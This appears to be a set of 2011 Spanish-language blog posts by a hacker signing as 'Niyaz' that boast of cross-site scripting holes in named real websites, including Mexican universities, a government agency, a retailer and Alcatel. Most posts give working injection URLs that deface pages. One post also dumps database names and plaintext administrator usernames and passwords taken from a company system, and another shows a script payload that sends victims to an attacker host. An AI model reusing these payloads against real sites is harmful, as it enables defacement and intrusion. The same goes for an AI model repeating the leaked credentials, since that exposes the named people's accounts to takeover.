Url afectada:

http://www.uvmnet.edu/contacto/?=btnSubmit=Enviar&cboAyuda=0&cboCampus=0&cboEstado=0&check=checkbox&Opcion=0&txtComments=&txtCuenta=&txtFrom=%22%3E%3Ccenter%3E%3Cfont%20size=99%20color=red%20%3E%3Cb%3ENiyaz%20was%20here%3C/b%3E%3C/font%3E%3C/center%3Ebad%3d%22&txtName=&txtTel=&txtTelCel=

Url web:

www.uvmnet.edu

Niyaz

Missão
Oferecer ao mercado corporativo, o melhor em Consultoria, tendo com o objetivo o aumento da produtividade e competitividade de seus clientes.

Dbs:

DTS
master
tempdb
model
msdb
ReportServer
ReportServerTempDB
Amigomouse
xpress
PCD
SistemaContas
SistemaCotacoes
StockCar
SAN
DicMaxInst
Mundo_Cobol
DTS
NovoTravessia
TravessiaSistema
intranet_amsw
Winzip
sg
sg_dts
Katalogo
strattus

————————————————–

Db: DTS

Table: Adm_Admin:

Usuario: danielt Contraseña: 20danielt06

Usuario: marciadts Contraseña: dts82latin

——————————————————————

Esto entre otras cosas interesantes

Saludos

By Niyaz

Son muchas las cosas que puede hacer con un Xss, desde obtener una cookie, infectar, redireccionar a una web maliciosa, etc.

Pero hay algo mas que se puede hacer, como en este caso poder tener acceso al equipo de la victima y tener un control total de ella.

Esto es muy sencillo con el simple uso de Metasploit, en este caso no voy a dar mas explicaciones de como hacer esto, ya que es algo sencillo:

Simplemente ingresando un codigo a la url:

http://www.ifai.org.mx/buscador_ifai/buscar.do?type=all&spell=true&lemmatize=true&fuentes=4&queryStr=<script>document.location=”http://www.atacante.com”</script>

Mas que nada esto es  para poder mostrar la gravedad de esta “simple falla”.

Esto principalmente afecta a los clientes de dicha web.

Como hoy bien sabemos se celebra el día de la seguridad informática. Actualmente ha aumentado el numero de ataques informáticos, por descuido de los administradores o por el simple hecho de no darle importancia y querer pagar por esos servicios.

“No debemos descuidar o dejar de darle importancia a una falla por mas mínima que sea”

Saludos.

Url afectada:

http://www.ifai.org.mx/buscador_ifai/buscar.do?type=all&spell=true&lemmatize=true&fuentes=4&queryStr=”><center><font%20size=99%20color=red%20><b>Niyaz%20was%20Here%20</b></font></center>

Url web:

www.ifai.org.mx

Niyaz

Url afectada:

http://www.elpalaciodehierro.com.mx/webapp/wcs/stores/servlet/TopCategoriesDisplay?catalogId=10051&storeId=10001&langId=-5&path=&offset=0&hits=24&sort_by=&cat_desc=&parent_cat=&originalQuery=%22%3E%3Ccenter%3E%3Cfont+size%3D99+color%3Dred+%3E%3Cb%3ENiyaz%20was%20here%3C%2Fb%3E%3C%2Ffont%3E%3C%2Fcenter%3E&hide1=0&catid=&categoryId=&displayAll=false&fromHeader=true&errorView=CatalogSearchResultView&byCatGroupId=false&query=%22%3E%3Ccenter%3E%3Cfont+size%3D99+color%3Dred+%3E%3Cb%3ENiyaz%20was%20here%3C%2Fb%3E%3C%2Ffont%3E%3C%2Fcenter%3E&x=0&y=0

Url web:

www.elpalaciodehierro.com.mx

url afectada:

http://www.uflp.edu.mx/uflp/index.php/%22%3E%3Ccenter%3E%3Cfont%20size=99%20color=red%20%3E%3Cb%3ENiyaz%20was%20here%3C/b%3E%3C/font%3E%3C/center%3E

url web:

www.uflp.edu.mx

url afectada:

http://www.i.edu.mx/admin.asp?user=admin&count=3&texto=%3Ccenter%3E%3Cfont%20size=99%20color=red%20%3E%3Cb%3ENiyaz%20was%20here%3C/b%3E%3C/font%3E%3C/center%3E

web:

http://www.i.edu.mx

by Niyaz

Url afectada:

http://www.intellego.com.mx/busqueda.php?b=%22%3E%3Ccenter%3E%3Cfont%20size=99%20color=red%20%3E%3Cb%3ENiyaz%20was%20here%3C/b%3E%3C/font%3E%3C/center%3E

]]> http://niyazblog.wordpress.com/2011/11/24/intellego-com-mx-vulnerable-a-xss/feed/ 0 Niyaz http://niyazblog.wordpress.com/2011/11/23/alcatel-vulnerable-a-xss/ http://niyazblog.wordpress.com/2011/11/23/alcatel-vulnerable-a-xss/#comments Wed, 23 Nov 2011 23:59:28 +0000 Niyaz http://niyazblog.wordpress.com/?p=184 ]]>

Url afectada:

http://www.alcatel-mobilephones.com/mx/content/search?SearchText=%22%3E%3Ccenter%3E%3Cfont+size%3D99+color%3Dred+%3E%3Cb%3ENiyaz%20was%20here%3C%2Fb%3E%3C%2Ffont%3E%3C%2Fcenter%3E

Saludos!

by Niyaz